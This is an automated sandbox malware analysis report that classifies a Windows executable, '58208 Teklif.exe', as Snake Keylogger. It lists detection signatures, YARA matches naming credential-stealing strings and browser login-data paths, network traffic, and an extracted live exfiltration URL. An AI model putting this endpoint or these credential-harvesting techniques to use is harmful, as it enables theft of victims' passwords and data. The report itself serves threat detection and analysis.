Windows Analysis Report
58208 Teklif.exe

Overview

General Information

Sample name: 58208 Teklif.exe
Analysis ID: 1422217
MD5: dc59e080bc0be8cee52ec9e79ccc7e82
SHA1: 22d8e9aab959c584acc896bfeed170ffa672f1cb
SHA256: 95e4dd6cc5a341f4440a113e0a832175aa2f5baafd9c7483255a18088e1c2764
Tags: exe, geo, TUR
Infos:

Detection

Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 58208 Teklif.exe (PID: 7436 cmdline: "C:\Users\user\Desktop\58208 Teklif.exe" MD5: DC59E080BC0BE8CEE52EC9E79CCC7E82)
    • 58208 Teklif.exe (PID: 7580 cmdline: "C:\Users\user\Desktop\58208 Teklif.exe" MD5: DC59E080BC0BE8CEE52EC9E79CCC7E82)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Url", "Exfil Url": "https://scratchdreams.tk/_send_.php?"}
Source | Rule | Description | Author | Strings
00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x14881:$a1: get_encryptedPassword
  • 0x14b77:$a2: get_encryptedUsername
  • 0x1468d:$a3: get_timePasswordChanged
  • 0x14788:$a4: get_passwordField
  • 0x14897:$a5: set_encryptedPassword
  • 0x15e9f:$a7: get_logins
  • 0x15e02:$a10: KeyLoggerEventArgs
  • 0x15a9b:$a11: KeyLoggerEventArgsEventHandler
00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_SnakeKeylogger | Detects Snake Keylogger | ditekSHen
  • 0x197d3:$x1: $%SMTPDV$
  • 0x1823a:$x2: $#TheHashHere%&
  • 0x1977b:$x3: %FTPDV$
  • 0x181ac:$x4: $%TelegramDv$
  • 0x15a9b:$x5: KeyLoggerEventArgs
  • 0x15e02:$x5: KeyLoggerEventArgs
  • 0x1979f:$m2: Clipboard Logs ID
  • 0x19989:$m2: Screenshot Logs ID
  • 0x19a55:$m2: keystroke Logs ID
  • 0x19961:$m4: \SnakeKeylogger\
00000003.00000002.3769706051.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
            Source | Rule | Description | Author | Strings
            0.2.58208 Teklif.exe.445b6e0.7.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
            0.2.58208 Teklif.exe.445b6e0.7.unpack | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
            0.2.58208 Teklif.exe.445b6e0.7.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
              • 0x12c81:$a1: get_encryptedPassword
              • 0x12f77:$a2: get_encryptedUsername
              • 0x12a8d:$a3: get_timePasswordChanged
              • 0x12b88:$a4: get_passwordField
              • 0x12c97:$a5: set_encryptedPassword
              • 0x1429f:$a7: get_logins
              • 0x14202:$a10: KeyLoggerEventArgs
              • 0x13e9b:$a11: KeyLoggerEventArgsEventHandler
            0.2.58208 Teklif.exe.445b6e0.7.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
              • 0x1a49d:$a2: \Comodo\Dragon\User Data\Default\Login Data
              • 0x196cf:$a3: \Google\Chrome\User Data\Default\Login Data
              • 0x19b02:$a4: \Orbitum\User Data\Default\Login Data
              • 0x1ab41:$a5: \Kometa\User Data\Default\Login Data
            0.2.58208 Teklif.exe.445b6e0.7.unpack | INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | Detects executables with potential process hoocking | ditekSHen
              • 0x13828:$s1: UnHook
              • 0x1382f:$s2: SetHook
              • 0x13837:$s3: CallNextHook
              • 0x13844:$s4: _hook
            No Sigma rule has matched
            No Snort rule has matched

            AV Detection

            Source: https://scratchdreams.tk | Avira URL Cloud: Label: malware
            Source: http://scratchdreams.tk | Avira URL Cloud: Label: malware
            Source: https://scratchdreams.tk/_send_.php?TS | Avira URL Cloud: Label: malware
            Source: 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Url", "Exfil Url": "https://scratchdreams.tk/_send_.php?"}
            Source: scratchdreams.tk | Virustotal: Detection: 6%
            Source: https://scratchdreams.tk | Virustotal: Detection: 15%
            Source: 58208 Teklif.exe | ReversingLabs: Detection: 52%
            Source: 58208 Teklif.exe | Virustotal: Detection: 65%
            Source: 58208 Teklif.exe | Joe Sandbox ML: detected
            Source: 58208 Teklif.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknown | HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.11:49711 version: TLS 1.0
            Source: unknown | HTTPS traffic detected: 172.67.169.18:443 -> 192.168.2.11:49727 version: TLS 1.2
            Source: 58208 Teklif.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: uVJY.pdb source: 58208 Teklif.exe
            Source: Binary string: uVJY.pdbSHA256N source: 58208 Teklif.exe

            Networking

            Source: Yara match | File source: 3.2.58208 Teklif.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.58208 Teklif.exe.447bf00.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.58208 Teklif.exe.445b6e0.7.raw.unpack, type: UNPACKEDPE
            Source: global traffic | HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1, Host: reallyfreegeoip.org, Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1, Host: reallyfreegeoip.org
            Source: global traffic | HTTP traffic detected: GET /_send_.php?TS HTTP/1.1, Host: scratchdreams.tk, Connection: Keep-Alive
            Source: Joe Sandbox View | IP Address: 104.21.67.152
            Source: Joe Sandbox View | IP Address: 172.67.169.18
            Source: Joe Sandbox View | IP Address: 193.122.130.0
            Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
            Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknown | DNS query: name: checkip.dyndns.org
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1, User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;), Host: checkip.dyndns.org, Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1, User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;), Host: checkip.dyndns.org
            Source: unknown | HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.11:49711 version: TLS 1.0
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | DNS traffic detected: queries for: checkip.dyndns.org
            Source: 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.00000000030A2000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003059000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000304B000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003093000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003066000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
            Source: 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.00000000030A2000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003059000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FED000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000304B000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003074000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003093000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003066000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
            Source: 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
            Source: 58208 Teklif.exe, 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
            Source: 58208 Teklif.exe | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: 58208 Teklif.exe | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
            Source: 58208 Teklif.exe | String found in binary or memory: http://ocsp.comodoca.com0
            Source: 58208 Teklif.exe, 00000003.00000002.3769706051.00000000030A2000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FC3000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003059000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000304B000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003093000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003066000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
            Source: 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: 58208 Teklif.exe, 00000003.00000002.3769706051.00000000030B0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://scratchdreams.tk
            Source: 58208 Teklif.exe | String found in binary or memory: http://tempuri.org/DataSet1.xsdCEscolha
            Source: 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.00000000030A2000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003059000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FED000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000304B000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003093000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003066000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
            Source: 58208 Teklif.exe, 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003066000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/102.129.152.231
            Source: 58208 Teklif.exe, 00000003.00000002.3769706051.00000000030A2000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003059000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FED000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000304B000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003093000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003066000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/102.129.152.231$
            Source: 58208 Teklif.exe, 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://scratchdreams.tk
            Source: 58208 Teklif.exe, 00000003.00000002.3769706051.00000000030B0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://scratchdreams.tk/_send_.php?TS
            Source: 58208 Teklif.exe | String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
            Source: unknown | HTTPS traffic detected: 172.67.169.18:443 -> 192.168.2.11:49727 version: TLS 1.2

            System Summary

            Source: 0.2.58208 Teklif.exe.445b6e0.7.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
            Source: 0.2.58208 Teklif.exe.445b6e0.7.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
            Source: 0.2.58208 Teklif.exe.445b6e0.7.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
            Source: 0.2.58208 Teklif.exe.445b6e0.7.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
            Source: 3.2.58208 Teklif.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
            Source: 3.2.58208 Teklif.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
            Source: 3.2.58208 Teklif.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
            Source: 3.2.58208 Teklif.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
            Source: 0.2.58208 Teklif.exe.447bf00.8.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
            Source: 0.2.58208 Teklif.exe.447bf00.8.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
            Source: 0.2.58208 Teklif.exe.447bf00.8.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
            Source: 0.2.58208 Teklif.exe.447bf00.8.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
            Source: 0.2.58208 Teklif.exe.447bf00.8.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
            Source: 0.2.58208 Teklif.exe.447bf00.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
            Source: 0.2.58208 Teklif.exe.447bf00.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
            Source: 0.2.58208 Teklif.exe.445b6e0.7.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
            Source: 0.2.58208 Teklif.exe.445b6e0.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
            Source: 0.2.58208 Teklif.exe.445b6e0.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
            Source: 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
            Source: 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Snake Keylogger | Author: ditekSHen
            Source: 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
            Source: 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Snake Keylogger | Author: ditekSHen
            Source: Process Memory Space: 58208 Teklif.exe PID: 7436, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
            Source: Process Memory Space: 58208 Teklif.exe PID: 7436, type: MEMORYSTR | Matched rule: Detects Snake Keylogger | Author: ditekSHen
            Source: Process Memory Space: 58208 Teklif.exe PID: 7580, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
            Source: Process Memory Space: 58208 Teklif.exe PID: 7580, type: MEMORYSTR | Matched rule: Detects Snake Keylogger | Author: ditekSHen
            Source: 58208 Teklif.exe, Static PE information: invalid certificate
            Source: 58208 Teklif.exe, 00000000.00000002.1319232533.000000000320C000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs 58208 Teklif.exe
            Source: 58208 Teklif.exe, 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs 58208 Teklif.exe
            Source: 58208 Teklif.exe, 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameTyrone.dll8 vs 58208 Teklif.exe
            Source: 58208 Teklif.exe, 00000000.00000000.1304898513.0000000000DCA000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenameuVJY.exe, vs 58208 Teklif.exe
            Source: 58208 Teklif.exe, 00000000.00000002.1322453048.0000000007D40000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameTyrone.dll8 vs 58208 Teklif.exe
            Source: 58208 Teklif.exe, 00000000.00000002.1317484204.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs 58208 Teklif.exe
            Source: 58208 Teklif.exe, 00000003.00000002.3765108626.0000000000DA7000.00000004.00000010.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameUNKNOWN_FILET vs 58208 Teklif.exe
            Source: 58208 Teklif.exe, 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs 58208 Teklif.exe
            Source: 58208 Teklif.exe, Binary or memory string: OriginalFilenameuVJY.exe, vs 58208 Teklif.exe
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: version.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: dwrite.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: version.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: rasapi32.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: rasman.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: rtutils.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: dhcpcsvc.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: secur32.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Section loaded: dpapi.dll
            Source: 58208 Teklif.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.2.58208 Teklif.exe.445b6e0.7.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.58208 Teklif.exe.445b6e0.7.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.58208 Teklif.exe.445b6e0.7.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.58208 Teklif.exe.445b6e0.7.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 3.2.58208 Teklif.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 3.2.58208 Teklif.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 3.2.58208 Teklif.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 3.2.58208 Teklif.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
